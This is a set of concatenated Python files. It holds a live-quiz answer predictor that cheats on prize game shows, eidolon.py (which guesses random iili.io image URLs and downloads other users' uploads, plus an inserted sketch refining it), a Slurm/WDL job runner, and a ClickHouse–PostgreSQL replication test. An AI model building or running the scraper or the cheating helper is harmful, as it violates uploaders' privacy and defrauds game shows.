word, 0, 0, 'speaker') thds.setDaemon(True) thds.start() def var(num): n = len(num) avg = 0 v = 0 for x in num: avg += x avg /= n for x in num: v += (avg - x) * (avg - x) v = pow(v,0.5) return v/(avg+1) def main(): global isExceptionGame args = parse_args() timeout = args.timeout speak("欢迎使用答题辅助器") print(""" 请先选择您是否需要开启Chrome浏览器辅助 它可以帮助您展示更多信息,但是也会降低结果匹配效率 【注意:若您使用可执行文件exe版本,这里请勿开启Chrome,否则报错】 输入 1-开启 2-不开启 """) chrome_sw = input("请输入数字: ") if chrome_sw == "1": enable_chrome = True elif chrome_sw == "2": enable_chrome = False else: enable_chrome = False if enable_chrome: closer = Event() noticer = Event() closer.clear() noticer.clear() reader, writer = Pipe() browser_daemon = multiprocessing.Process( target=run_browser, args=(closer, noticer, reader,)) browser_daemon.daemon = True browser_daemon.start() def __inner_job(): global isNegativeQuestion,origQuestion,isExceptionGame start = time.time() cur_path = os.path.abspath(os.curdir) path = cur_path + "\\screenshots" if not os.path.exists(path): os.makedirs(path) if game_platform!=3: if game_platform==2: text_binary = analyze_current_screen_text( directory=data_directory, compress_level=image_compress_level[0], crop_area = crop_areas[game_type] ) else: text_binary = analyze_current_screen_text_ios( directory=data_directory, compress_level=image_compress_level[0], crop_area=crop_areas[game_type] ) keywords = get_text_from_image( image_data=text_binary, ) if not keywords: print("本题不能识别,请尽快自行作答!") return true_flag, real_question, question, answers = parse_question_and_answer(keywords) else: true_flag, real_question, question, answers = parse_question_and_answer(test_key) orig_answer = answers # 分词预处理 allanswers = '' optioncount = 0 isNewAlgUsable = False isAnswerAllNum = False for i in answers: allanswers = allanswers + i optioncount += 1 if i.isdigit(): isAnswerAllNum = True if isAnswerAllNum == False: repeatanswers = get_repeat_num_seq(allanswers) else: repeatanswers = [['',0]] maxlen = 0 delword = '' # 预分词目标:找到选项中的重复部分,提升选项之间的差异性 if optioncount>=3: isNewAlgUsable = True if isNewAlgUsable: if isAnswerAllNum == False: for (d,x) in repeatanswers: if x>=3 and len(d)>maxlen: maxlen = len(d) delword = d else: delword = '' print("") print("*" * 40) print('题目: ' + origQuestion) print("*" * 40) # notice browser if enable_chrome: writer.send(question) noticer.set() search_question = pre_process_question(question) thd1 = SearchThread(search_question, answers, timeout, delword, 'baidu') thd2 = SearchThread(search_question, answers, timeout, delword, 'bing') thd3 = SearchThread(search_question, answers, timeout, delword, 'zhidao') thd7 = SearchThread(search_question, answers, timeout, delword, 'so') if isNewAlgUsable: # V4.7 修正OCR识别不全导致无法继续检索的问题。 Thanks To Github/Misakio (数组越界) search_question_1 = search_question + " " + answers[0].replace(delword, "") search_question_2 = search_question + " " + answers[1].replace(delword, "") search_question_3 = search_question + " " + answers[2].replace(delword, "") thd4 = SearchThread(search_question_1, answers, timeout, delword, 'baidu', numofquery=10) thd5 = SearchThread(search_question_2, answers, timeout, delword, 'baidu', numofquery=10) thd6 = SearchThread(search_question_3, answers, timeout, delword, 'baidu', numofquery=10) # QMI算法7线程 thd_QA1 = SearchThread(search_question_1, answers, timeout, delword, 'baiduqmi', numofquery=5) thd_QA2 = SearchThread(search_question_2, answers, timeout, delword, 'baiduqmi', numofquery=5) thd_QA3 = SearchThread(search_question_3, answers, timeout, delword, 'baiduqmi', 
numofquery=5) thd_A1 = SearchThread(answers[0], answers, timeout, delword, 'baiduqmi', numofquery=5) thd_A2 = SearchThread(answers[1], answers, timeout, delword, 'baiduqmi', numofquery=5) thd_A3 = SearchThread(answers[2], answers, timeout, delword, 'baiduqmi', numofquery=5) thd_Q = SearchThread(search_question, answers, timeout, delword, 'baiduqmi', numofquery=5) # 创立并发线程 if __name__ == '__main__': thd1.setDaemon(True) thd1.start() thd2.setDaemon(True) thd2.start() thd3.setDaemon(True) thd3.start() thd7.setDaemon(True) thd7.start() if isNewAlgUsable: thd4.setDaemon(True) thd4.start() thd5.setDaemon(True) thd5.start() thd6.setDaemon(True) thd6.start() thd_QA1.setDaemon(True) thd_QA1.start() thd_QA2.setDaemon(True) thd_QA2.start() thd_QA3.setDaemon(True) thd_QA3.start() thd_A1.setDaemon(True) thd_A1.start() thd_A2.setDaemon(True) thd_A2.start() thd_A3.setDaemon(True) thd_A3.start() thd_Q.setDaemon(True) thd_Q.start() # 顺序开启3线程 thd1.join() thd2.join() thd3.join() thd7.join() if isNewAlgUsable: thd4.join() thd5.join() thd6.join() thd_QA1.join() thd_QA2.join() thd_QA3.join() thd_A1.join() thd_A2.join() thd_A3.join() thd_Q.join() # 等待线程执行结束 summary = thd1.get_result() summary2 = thd2.get_result() summary3 = thd3.get_result() summary7 = thd7.get_result() if isNewAlgUsable: summary4 = thd4.get_result() summary5 = thd5.get_result() summary6 = thd6.get_result() num_QA1 = thd_QA1.get_result() num_QA2 = thd_QA2.get_result() num_QA3 = thd_QA3.get_result() num_A1 = thd_A1.get_result() num_A2 = thd_A2.get_result() num_A3 = thd_A3.get_result() num_Q = thd_Q.get_result() # 获取线程执行结果 # 下面开始合并结果并添加可靠性标志 creditFlag = True credit = 0 summary_t = summary for i in range(0,len(summary)): summary_t[answers[i]] += summary2[answers[i]] summary_t[answers[i]] += summary7[answers[i]] summary_t[answers[i]] += summary3[answers[i]] credit += summary_t[answers[i]] va = summary_t.values() if credit < 2 or var(summary_t.values()) < 0.71: creditFlag = False if isNegativeQuestion == False: summary_li = sorted(summary_t.items(), key=operator.itemgetter(1), reverse=True) else: summary_li = sorted(summary_t.items(), key=operator.itemgetter(1), reverse=False) summary_newalg = dict() if isNewAlgUsable: # 先算一下QMI指数 A1_qmi = (num_QA1) / (num_Q * num_A1) A2_qmi = (num_QA2) / (num_Q * num_A2) A3_qmi = (num_QA3) / (num_Q * num_A3) qmi_max = max(A1_qmi,A2_qmi,A3_qmi) # 配置模型控制参数 if isNegativeQuestion: weight1 = 10 adding1 = 1 weight2 = 1 adding2 = 10 else: weight1 = 10 adding1 = 1 weight2 = 1 adding2 = 10 a = (summary_t[orig_answer[0]]*weight1+adding1) * (((summary5[orig_answer[0]] + summary6[orig_answer[0]]))*weight2 +adding2 ) b = (summary_t[orig_answer[1]]*weight1+adding1) * (((summary4[orig_answer[1]] + summary6[orig_answer[1]]))*weight2 +adding2 ) c = (summary_t[orig_answer[2]]*weight1+adding1) * (((summary4[orig_answer[2]] + summary5[orig_answer[2]]))*weight2 +adding2 ) similar_max = max(a, b, c) # 以下判断没有严格的理论基础,暂时不开启 if isNegativeQuestion and creditFlag==False and False: a = similar_max - a + 1 b = similar_max - b + 1 c = similar_max - c + 1 a = float("%.6f" % ((a/(similar_max))*(A1_qmi/(qmi_max)))) b = float("%.6f" % ((b/(similar_max))*(A2_qmi/(qmi_max)))) c = float("%.6f" % ((c/(similar_max))*(A3_qmi/(qmi_max)))) summary_newalg.update({orig_answer[0]: (a)}) summary_newalg.update({orig_answer[1]: (b)}) summary_newalg.update({orig_answer[2]: (c)}) data = [("选项", "权重", "相似度")] topscore = 0 for ans, w in summary_li: if w > topscore: topscore = w for ans, w in summary_li: if isNegativeQuestion==False: if isNewAlgUsable: # 
修正V4的BUG:可能导致不能继续识别的问题 data.append((ans, w, summary_newalg[ans])) else: data.append((ans, w, '0')) else: if isNewAlgUsable: data.append((ans, topscore-w+1, summary_newalg[ans])) else: data.append((ans, topscore - w + 1, '0')) table = AsciiTable(data) print(table.table) print("") end = time.time() print("分析结果 耗时 {0} 秒 听语音更靠谱".format("%.1f" % (end - start))) print("*" * 40) print("") if creditFlag == False: print(" !【 本题预测结果不是很可靠,请慎重 】 !") if isNegativeQuestion==True: print(" !【 本题是否定提法,已帮您优化结果! 】 !") if isNewAlgUsable==False: print(" √ 混合算法建议 : ", summary_li[0][0],' (第',orig_answer.index(summary_li[0][0])+1,'项)') # 测试:新匹配算法 if isNegativeQuestion == True: ngflg = '1' else: ngflg = '0' if isNewAlgUsable: if isNegativeQuestion == False: summary_li2 = sorted(summary_newalg.items(), key=operator.itemgetter(1), reverse=True) #True else: summary_li2 = sorted(summary_newalg.items(), key=operator.itemgetter(1), reverse=False) #False print(" √ 关联算法建议 : ", summary_li2[0][0],' (第',orig_answer.index(summary_li2[0][0])+1,'项)') # 神经网络计算,采用预训练参数 feature = np.array( [int(summary_t[orig_answer[0]]), int(summary_t[orig_answer[1]]), int(summary_t[orig_answer[2]]), int(summary4[orig_answer[0]]), int(summary4[orig_answer[1]]), int(summary4[orig_answer[2]]), int(summary5[orig_answer[0]]), int(summary5[orig_answer[1]]), int(summary5[orig_answer[2]]), int(summary6[orig_answer[0]]), int(summary6[orig_answer[1]]), int(summary6[orig_answer[2]]), float('%.5f' % (A1_qmi / qmi_max)), float('%.5f' % (A2_qmi / qmi_max)), float('%.5f' % (A3_qmi / qmi_max))]) feature = np.matrix(feature) nn_re = predict(feature, get_theta1(isNegativeQuestion), get_theta2(isNegativeQuestion)) nn_re = nn_re[0] #print(nn_re) nn_re = nn_re.index(max(nn_re)) print(' √ 神经网络输出 : ', orig_answer[nn_re], ' (第', str(nn_re + 1), '项)') if orig_answer.index(summary_li2[0][0]) == nn_re and creditFlag==True: print(" √ 【 结果可信度高 ,选择 第",orig_answer.index(summary_li[0][0])+1,"项 !】") speak("第{}项{}".format(orig_answer.index(summary_li[0][0])+1,summary_li[0][0])) print(" × 排除选项 : ", summary_li2[-1][0]) elif creditFlag==False: speak("谨慎第{}项谨慎".format(orig_answer.index(summary_li2[0][0]) + 1)) print(" × 排除选项 : ", summary_li2[-1][0]) else: speak("谨慎第{}项谨慎".format(nn_re + 1)) print(" × 排除选项 : ", summary_li[-1][0]) else: speak("谨慎第{}项谨慎".format(orig_answer.index(summary_li[0][0])+1)) print("选项识别有些问题,新算法此题未开启") print(" × 排除选项 : ", summary_li[-1][0]) if game_platform==3: print('') print(orig_answer) real_answer = input("请输入本题正确答案:") with open('testset_record_feature.txt', 'a+') as f: featurestr = str(summary_t[orig_answer[0]]) + '|' + str(summary_t[orig_answer[1]]) + '|' + str(summary_t[orig_answer[2]]) featurestr += '|' + str(summary4[orig_answer[0]]) + '|' + str(summary4[orig_answer[1]]) + '|' + str(summary4[orig_answer[2]]) featurestr += '|' + str(summary5[orig_answer[0]]) + '|' + str(summary5[orig_answer[1]]) + '|' + str(summary5[orig_answer[2]]) featurestr += '|' + str(summary6[orig_answer[0]]) + '|' + str(summary6[orig_answer[1]]) + '|' + str(summary6[orig_answer[2]]) featurestr += '|' + ('%.5f' % (A1_qmi/qmi_max)) + '|' + ('%.5f' % (A2_qmi/qmi_max)) + '|' + ('%.5f' % (A3_qmi/qmi_max)) + '|' + ngflg + '|' + real_answer + '\n' f.write(featurestr) if game_platform != 3 : # 输出知识树 thdtree = SearchThread(search_question, answers, timeout, delword, 'zhidaotree') thdtree.setDaemon(True) thdtree.start() thdtree.join() summary_tree = thdtree.get_result() print("") print("") print("辅助知识树") print("*" * 40) for ans in summary_tree: print(ans) save_screen( 
directory=data_directory ) save_record( origQuestion, orig_answer ) print(""" Branch版本:V5.1 Branch作者:GitHub/leyuwei 请选择答题节目: 1. 百万英雄 2. 冲顶大会 3. 知乎答题 """) game_type = input("输入游戏编号: ") if game_type == "1": game_type = '百万英雄' isExceptionGame = False elif game_type == "2": game_type = '冲顶大会' isExceptionGame = False elif game_type == "3": game_type = '知乎答题' isExceptionGame = True else: game_type = '百万英雄' isExceptionGame = False print(""" 操作平台的一些说明:如果您是iOS,则必须使用您的电脑创建WiFi热点并将您的iOS设备连接到该热点, 脚本即将为您打开投屏软件,您需要按照软件的提示进行操作。 如果您使用的是Android则无需担心,将您的设备使用数据线连接电脑,开启Adb 调试即可正常使用该脚本。 请选择您的设备平台: 1. iOS 2. Android 3. 测试集特征添加(仅供开发者用) """) game_platform = input("输入平台编号: ") if game_platform == "1": game_platform = 1 if check_exsit()==0: print("正在唤醒投屏软件,请同意管理员权限并按照软件要求将您的iOS设备投放在电脑屏幕上,最后再回到该脚本进行操作。") win32api.ShellExecute(0, 'open', 'airplayer.exe', '', '', 0) else: print("投屏软件已经启动。") elif game_platform == "2": game_platform = 2 elif game_platform == "3": game_platform = 3 else: game_platform = 1 os.system("cls") # Windows清屏 while True: print(""" ------------------------------------ 请在答题开始前运行程序, 答题开始的时候按Enter预测答案 ------------------------------------ """) if game_platform!=3: enter = input("按Enter键开始,按ESC键退出...") if enter == chr(27): break os.system("cls") # Windows清屏 try: __inner_job() except Exception as e: print("截图分析过程中出现故障,请确认设备是否连接正确(投屏正常),网络是否通畅!") speak("出现问题!") else: if os.path.exists('testset_record.txt'): with open('testset_record.txt', 'r') as f: reclist = f.readlines() for rec in reclist: recitem = rec.split('|') test_key = recitem[0:4] test_key[0] = '1.'+test_key[0] try: __inner_job() except Exception as e: print("添加特征值过程中出现故障。") break if enable_chrome: reader.close() writer.close() closer.set() time.sleep(3) if __name__ == "__main__": main()
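# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original script): the quiz helper above
# starts many SearchThread workers as daemons, joins them, then collects their
# values with get_result(). That is the common "thread that returns a value"
# pattern. The class below is a minimal, generic stand-in for that pattern;
# SearchThread's real constructor arguments (query text, answers, timeout,
# delword, engine tag, numofquery) belong to the original code and are not
# reproduced here.
import threading


class ResultThread(threading.Thread):
    """A thread whose return value can be collected after join()."""

    def __init__(self, fn, *args, **kwargs):
        super().__init__(daemon=True)
        self._fn = fn
        self._args = args
        self._kwargs = kwargs
        self._result = None

    def run(self):
        # Exceptions are stored rather than raised only to keep the sketch
        # short; a fuller implementation would re-raise them in get_result().
        try:
            self._result = self._fn(*self._args, **self._kwargs)
        except Exception as exc:  # noqa: BLE001 - illustrative only
            self._result = exc

    def get_result(self):
        return self._result


if __name__ == "__main__":
    t = ResultThread(sum, range(10))
    t.start()
    t.join()
    print(t.get_result())  # 45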
eidolon.py
# Made by @venaxyt on Github import threading, requests, gratient, random, string, os banner = """ ▄███▄ ▄█ ██▄ ████▄ █ ████▄ ▄ █▀ ▀ ██ █ █ █ █ █ █ █ █ ██▄▄ ██ █ █ █ █ █ █ █ ██ █ █▄ ▄▀ ▐█ █ █ ▀████ ███▄ ▀████ █ █ █ ▀███▀ ▐ ███▀ ▀ █ █ █ v e n a x █ ██ """ print(gratient.purple(banner)) image_directory = f"C:\\Users\\{os.getenv('UserName')}\\Desktop\\images" def FREEIMAGEHOST(): while True: image_code = "".join(random.choice(string.ascii_uppercase + string.digits + string.ascii_lowercase) for _ in range(6)) FREEIMAGEHOST_image_link = f"https://iili.io/{image_code}.png" FREEIMAGEHOST_image = requests.get(FREEIMAGEHOST_image_link) if FREEIMAGEHOST_image.status_code == 200: print(gratient.blue(f" [>] FREEIMAGEHOST : {FREEIMAGEHOST_image_link}"), end = "") FREEIMAGEHOST_image_download = requests.get(FREEIMAGEHOST_image_link) open(f"{image_directory}\\{image_code}.png", "wb").write(FREEIMAGEHOST_image_download.content) # v e n a x threading.Thread(target = FREEIMAGEHOST).start(); threading.Thread(target = FREEIMAGEHOST).start(); threading.Thread(target = FREEIMAGEHOST).start(); threading.Thread(target = FREEIMAGEHOST).start()
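# ---------------------------------------------------------------------------
# Illustrative sketch (not part of eidolon.py): the loop above downloads every
# hit twice (once to check the status code, once to save it) and never closes
# the output file. A tighter variant of the same idea, assuming the same
# iili.io URL scheme and a local "images" folder, reuses the body that was
# already fetched and writes it through a context manager.
import os
import random
import string
from typing import Optional

import requests

IMAGE_DIR = os.path.join(os.path.expanduser("~"), "Desktop", "images")  # assumed location


def fetch_random_image(session: requests.Session) -> Optional[str]:
    """Try one random 6-character code; return the saved path on a hit, else None."""
    code = "".join(random.choices(string.ascii_letters + string.digits, k=6))
    url = f"https://iili.io/{code}.png"
    resp = session.get(url, timeout=10)
    if resp.status_code != 200:
        return None
    os.makedirs(IMAGE_DIR, exist_ok=True)
    path = os.path.join(IMAGE_DIR, f"{code}.png")
    with open(path, "wb") as fh:
        fh.write(resp.content)  # reuse the already-downloaded body
    return path


if __name__ == "__main__":
    with requests.Session() as s:
        print(fetch_random_image(s))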
SpecialRunner.py
import os from threading import Thread from subprocess import Popen, PIPE from time import sleep, time from select import select class SpecialRunner: """ This class provides the interface to run special job types like CWL, WDL and HPC. """ def __init__(self, config, job_id, logger=None): """ Inputs: config dictionary, Job ID, and optional logger """ self.config = config self.top_job_id = job_id self.logger = logger self.token = config["token"] self.workdir = config.get("workdir", "/mnt/awe/condor") self.shareddir = os.path.join(self.workdir, "workdir/tmp") self.containers = [] self.threads = [] self.allowed_types = ["slurm", "wdl"] _BATCH_POLL = 10 _FILE_POLL = 10 _MAX_RETRY = 5 def run(self, config, data, job_id, callback=None, fin_q=[]): # TODO: # initialize working space # check job type against an allow list # submit the job and map the batch jobb to the job id # start a thread to monitor progress (module, method) = data["method"].split(".") if module != "special": err = "Attempting to run the wrong type of module. " err += "The module should be 'special'" raise ValueError(err) if method not in self.allowed_types: raise ValueError("Invalid special method type") if method == "slurm": return self._batch_submit(method, config, data, job_id, fin_q) elif method == "wdl": return self._wdl_run(method, config, data, job_id, fin_q) def _check_batch_job(self, check, slurm_jobid): cmd = [check, slurm_jobid] proc = Popen(cmd, stdout=PIPE, stderr=PIPE) stdout, stderr = proc.communicate() return stdout.decode("utf-8").rstrip() def _watch_batch(self, stype, job_id, slurm_jobid, outfile, errfile, queues): self.logger.log("Watching Slurm Job ID %s" % (slurm_jobid)) check = "%s_checkjob" % (stype) cont = True retry = 0 # Wait for job to start out output file to appear while cont: state = self._check_batch_job(check, slurm_jobid) if state == "Running": self.logger.log("Running") elif state == "Pending": self.logger.log("Pending") elif state == "Finished": cont = False self.logger.log("Finished") else: if retry > self._MAX_RETRY: cont = False retry += 1 self.logger.log("Unknown") if os.path.exists(outfile): cont = False sleep(self._BATCH_POLL) # Tail output rlist = [] stdout = None stderr = None if os.path.exists(outfile): stdout = open(outfile) rlist.append(stdout) else: self.logger.error("No output file generated") if os.path.exists(errfile): stderr = open(errfile) rlist.append(stderr) else: self.logger.error("No error file generated") cont = True if len(rlist) == 0: cont = False next_check = 0 while cont: if time() > next_check: state = self._check_batch_job(check, slurm_jobid) next_check = time() + self._BATCH_POLL if state != "Running": cont = False r, w, e = select(rlist, [], [], 10) for f in r: for line in f: if f == stdout and self.logger: self.logger.log(line) elif f == stderr and self.logger: self.logger.error(line) sleep(self._FILE_POLL) # TODO: Extract real exit code resp = {"exit_status": 0, "output_file": outfile, "error_file": errfile} result = {"result": [resp]} for q in queues: q.put(["finished_special", job_id, result]) def _batch_submit(self, stype, config, data, job_id, fin_q): """ This subbmits the job to the batch system and starts a thread to monitor the progress. The assumptions are there is a submit script and the batch system will return a job id and log output to a specified file. 
""" params = data["params"][0] submit = "%s_submit" % (stype) if "submit_script" not in params: raise ValueError("Missing submit script") os.chdir(self.shareddir) scr = params["submit_script"] if not os.path.exists(scr): raise OSError("Submit script not found at %s" % (scr)) outfile = "%s.out" % (job_id) errfile = "%s.err" % (job_id) cmd = [submit, scr, outfile, errfile] proc = Popen(cmd, stdout=PIPE, stderr=PIPE) stdout, stderr = proc.communicate() slurm_jobid = stdout.decode("utf-8").rstrip() out = Thread( target=self._watch_batch, args=[stype, job_id, slurm_jobid, outfile, errfile, fin_q], ) self.threads.append(out) out.start() self.containers.append(proc) return proc def _readio(self, p, job_id, queues): cont = True last = False while cont: rlist = [p.stdout, p.stderr] x = select(rlist, [], [], 1)[0] for f in x: if f == p.stderr: error = 1 else: error = 0 lines = [] for line in f.read().decode("utf-8").split("\n"): lines.append({"line": line, "is_error": error}) if len(lines) > 0: self.logger.log_lines(lines) if last: cont = False if p.poll() is not None: last = True resp = {"exit_status": p.returncode, "output_file": None, "error_file": None} result = {"result": [resp]} p.wait() for q in queues: q.put(["finished_special", job_id, result]) def _wdl_run(self, stype, config, data, job_id, queues): """ This subbmits the job to the batch system and starts a thread to monitor the progress. """ params = data["params"][0] if "workflow" not in params: raise ValueError("Missing workflow script") if "inputs" not in params: raise ValueError("Missing inputs") os.chdir(self.shareddir) wdl = params["workflow"] if not os.path.exists(wdl): raise OSError("Workflow script not found at %s" % (wdl)) inputs = params["inputs"] if not os.path.exists(inputs): raise OSError("Inputs file not found at %s" % (inputs)) cmd = ["wdl_run", inputs, wdl] proc = Popen(cmd, bufsize=0, stdout=PIPE, stderr=PIPE) out = Thread(target=self._readio, args=[proc, job_id, queues]) self.threads.append(out) out.start() self.containers.append(proc) return proc
test.py
import pytest import time import psycopg2 import os.path as p import random from helpers.cluster import ClickHouseCluster from helpers.test_tools import assert_eq_with_retry from psycopg2.extensions import ISOLATION_LEVEL_AUTOCOMMIT from helpers.test_tools import TSV from random import randrange import threading cluster = ClickHouseCluster(__file__) instance = cluster.add_instance('instance', main_configs = ['configs/log_conf.xml'], user_configs = ['configs/users.xml'], with_postgres=True, stay_alive=True) postgres_table_template = """ CREATE TABLE IF NOT EXISTS "{}" ( key Integer NOT NULL, value Integer, PRIMARY KEY(key)) """ postgres_table_template_2 = """ CREATE TABLE IF NOT EXISTS "{}" ( key Integer NOT NULL, value1 Integer, value2 Integer, value3 Integer, PRIMARY KEY(key)) """ postgres_table_template_3 = """ CREATE TABLE IF NOT EXISTS "{}" ( key1 Integer NOT NULL, value1 Integer, key2 Integer NOT NULL, value2 Integer NOT NULL) """ def get_postgres_conn(ip, port, database=False, auto_commit=True, database_name='postgres_database', replication=False): if database == True: conn_string = "host={} port={} dbname='{}' user='postgres' password='mysecretpassword'".format(ip, port, database_name) else: conn_string = "host={} port={} user='postgres' password='mysecretpassword'".format(ip, port) if replication: conn_string += " replication='database'" conn = psycopg2.connect(conn_string) if auto_commit: conn.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT) conn.autocommit = True return conn def create_replication_slot(conn, slot_name='user_slot'): cursor = conn.cursor() cursor.execute('CREATE_REPLICATION_SLOT {} LOGICAL pgoutput EXPORT_SNAPSHOT'.format(slot_name)) result = cursor.fetchall() print(result[0][0]) # slot name print(result[0][1]) # start lsn print(result[0][2]) # snapshot return result[0][2] def drop_replication_slot(conn, slot_name='user_slot'): cursor = conn.cursor() cursor.execute("select pg_drop_replication_slot('{}')".format(slot_name)) def create_postgres_db(cursor, name='postgres_database'): cursor.execute("CREATE DATABASE {}".format(name)) def drop_postgres_db(cursor, name='postgres_database'): cursor.execute("DROP DATABASE IF EXISTS {}".format(name)) def create_clickhouse_postgres_db(ip, port, name='postgres_database'): instance.query(''' CREATE DATABASE {} ENGINE = PostgreSQL('{}:{}', '{}', 'postgres', 'mysecretpassword')'''.format(name, ip, port, name)) def drop_clickhouse_postgres_db(name='postgres_database'): instance.query('DROP DATABASE {}'.format(name)) def create_materialized_db(ip, port, materialized_database='test_database', postgres_database='postgres_database', settings=[]): create_query = "CREATE DATABASE {} ENGINE = MaterializedPostgreSQL('{}:{}', '{}', 'postgres', 'mysecretpassword')".format(materialized_database, ip, port, postgres_database) if len(settings) > 0: create_query += " SETTINGS " for i in range(len(settings)): if i != 0: create_query += ', ' create_query += settings[i] instance.query(create_query) assert materialized_database in instance.query('SHOW DATABASES') def drop_materialized_db(materialized_database='test_database'): instance.query('DROP DATABASE IF EXISTS {}'.format(materialized_database)) assert materialized_database not in instance.query('SHOW DATABASES') def drop_postgres_table(cursor, table_name): cursor.execute("""DROP TABLE IF EXISTS "{}" """.format(table_name)) def create_postgres_table(cursor, table_name, replica_identity_full=False, template=postgres_table_template): drop_postgres_table(cursor, table_name) 
cursor.execute(template.format(table_name)) if replica_identity_full: cursor.execute('ALTER TABLE {} REPLICA IDENTITY FULL;'.format(table_name)) queries = [ 'INSERT INTO postgresql_replica_{} select i, i from generate_series(0, 10000) as t(i);', 'DELETE FROM postgresql_replica_{} WHERE (value*value) % 3 = 0;', 'UPDATE postgresql_replica_{} SET value = value - 125 WHERE key % 2 = 0;', "UPDATE postgresql_replica_{} SET key=key+20000 WHERE key%2=0", 'INSERT INTO postgresql_replica_{} select i, i from generate_series(40000, 50000) as t(i);', 'DELETE FROM postgresql_replica_{} WHERE key % 10 = 0;', 'UPDATE postgresql_replica_{} SET value = value + 101 WHERE key % 2 = 1;', "UPDATE postgresql_replica_{} SET key=key+80000 WHERE key%2=1", 'DELETE FROM postgresql_replica_{} WHERE value % 2 = 0;', 'UPDATE postgresql_replica_{} SET value = value + 2000 WHERE key % 5 = 0;', 'INSERT INTO postgresql_replica_{} select i, i from generate_series(200000, 250000) as t(i);', 'DELETE FROM postgresql_replica_{} WHERE value % 3 = 0;', 'UPDATE postgresql_replica_{} SET value = value * 2 WHERE key % 3 = 0;', "UPDATE postgresql_replica_{} SET key=key+500000 WHERE key%2=1", 'INSERT INTO postgresql_replica_{} select i, i from generate_series(1000000, 1050000) as t(i);', 'DELETE FROM postgresql_replica_{} WHERE value % 9 = 2;', "UPDATE postgresql_replica_{} SET key=key+10000000", 'UPDATE postgresql_replica_{} SET value = value + 2 WHERE key % 3 = 1;', 'DELETE FROM postgresql_replica_{} WHERE value%5 = 0;' ] def assert_nested_table_is_created(table_name, materialized_database='test_database'): database_tables = instance.query('SHOW TABLES FROM {}'.format(materialized_database)) while table_name not in database_tables: time.sleep(0.2) database_tables = instance.query('SHOW TABLES FROM {}'.format(materialized_database)) assert(table_name in database_tables) @pytest.mark.timeout(320) def check_tables_are_synchronized(table_name, order_by='key', postgres_database='postgres_database', materialized_database='test_database'): assert_nested_table_is_created(table_name, materialized_database) expected = instance.query('select * from {}.{} order by {};'.format(postgres_database, table_name, order_by)) result = instance.query('select * from {}.{} order by {};'.format(materialized_database, table_name, order_by)) while result != expected: time.sleep(0.5) result = instance.query('select * from {}.{} order by {};'.format(materialized_database, table_name, order_by)) assert(result == expected) @pytest.fixture(scope="module") def started_cluster(): try: cluster.start() conn = get_postgres_conn(ip=cluster.postgres_ip, port=cluster.postgres_port) cursor = conn.cursor() create_postgres_db(cursor, 'postgres_database') create_clickhouse_postgres_db(ip=cluster.postgres_ip, port=cluster.postgres_port) instance.query("DROP DATABASE IF EXISTS test_database") yield cluster finally: cluster.shutdown() def test_load_and_sync_all_database_tables(started_cluster): drop_materialized_db() conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True) cursor = conn.cursor() NUM_TABLES = 5 for i in range(NUM_TABLES): table_name = 'postgresql_replica_{}'.format(i) create_postgres_table(cursor, table_name); instance.query("INSERT INTO postgres_database.{} SELECT number, number from numbers(50)".format(table_name)) create_materialized_db(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port) assert 'test_database' in instance.query('SHOW DATABASES') for i in range(NUM_TABLES): table_name = 
'postgresql_replica_{}'.format(i) check_tables_are_synchronized(table_name); cursor.execute('drop table {};'.format(table_name)) result = instance.query('''SELECT count() FROM system.tables WHERE database = 'test_database';''') assert(int(result) == NUM_TABLES) drop_materialized_db() for i in range(NUM_TABLES): cursor.execute('drop table if exists postgresql_replica_{};'.format(i)) def test_replicating_dml(started_cluster): drop_materialized_db() conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True) cursor = conn.cursor() NUM_TABLES = 5 for i in range(NUM_TABLES): create_postgres_table(cursor, 'postgresql_replica_{}'.format(i)); instance.query("INSERT INTO postgres_database.postgresql_replica_{} SELECT number, {} from numbers(50)".format(i, i)) create_materialized_db(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port) for i in range(NUM_TABLES): instance.query("INSERT INTO postgres_database.postgresql_replica_{} SELECT 50 + number, {} from numbers(1000)".format(i, i)) for i in range(NUM_TABLES): table_name = 'postgresql_replica_{}'.format(i) check_tables_are_synchronized(table_name); for i in range(NUM_TABLES): cursor.execute('UPDATE postgresql_replica_{} SET value = {} * {} WHERE key < 50;'.format(i, i, i)) cursor.execute('UPDATE postgresql_replica_{} SET value = {} * {} * {} WHERE key >= 50;'.format(i, i, i, i)) for i in range(NUM_TABLES): check_tables_are_synchronized('postgresql_replica_{}'.format(i)); for i in range(NUM_TABLES): cursor.execute('DELETE FROM postgresql_replica_{} WHERE (value*value + {}) % 2 = 0;'.format(i, i)) cursor.execute('UPDATE postgresql_replica_{} SET value = value - (value % 7) WHERE key > 128 AND key < 512;'.format(i)) cursor.execute('DELETE FROM postgresql_replica_{} WHERE key % 7 = 1;'.format(i, i)) for i in range(NUM_TABLES): check_tables_are_synchronized('postgresql_replica_{}'.format(i)); for i in range(NUM_TABLES): cursor.execute('drop table if exists postgresql_replica_{};'.format(i)) drop_materialized_db() def test_different_data_types(started_cluster): drop_materialized_db() conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True) cursor = conn.cursor() cursor.execute('drop table if exists test_data_types;') cursor.execute('drop table if exists test_array_data_type;') cursor.execute( '''CREATE TABLE test_data_types ( id integer PRIMARY KEY, a smallint, b integer, c bigint, d real, e double precision, f serial, g bigserial, h timestamp, i date, j decimal(5, 5), k numeric(5, 5))''') cursor.execute( '''CREATE TABLE test_array_data_type ( key Integer NOT NULL PRIMARY KEY, a Date[] NOT NULL, -- Date b Timestamp[] NOT NULL, -- DateTime64(6) c real[][] NOT NULL, -- Float32 d double precision[][] NOT NULL, -- Float64 e decimal(5, 5)[][][] NOT NULL, -- Decimal32 f integer[][][] NOT NULL, -- Int32 g Text[][][][][] NOT NULL, -- String h Integer[][][], -- Nullable(Int32) i Char(2)[][][][], -- Nullable(String) k Char(2)[] -- Nullable(String) )''') create_materialized_db(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port) for i in range(10): instance.query(''' INSERT INTO postgres_database.test_data_types VALUES ({}, -32768, -2147483648, -9223372036854775808, 1.12345, 1.1234567890, 2147483647, 9223372036854775807, '2000-05-12 12:12:12.012345', '2000-05-12', 0.2, 0.2)'''.format(i)) check_tables_are_synchronized('test_data_types', 'id'); result = instance.query('SELECT * FROM test_database.test_data_types ORDER BY id LIMIT 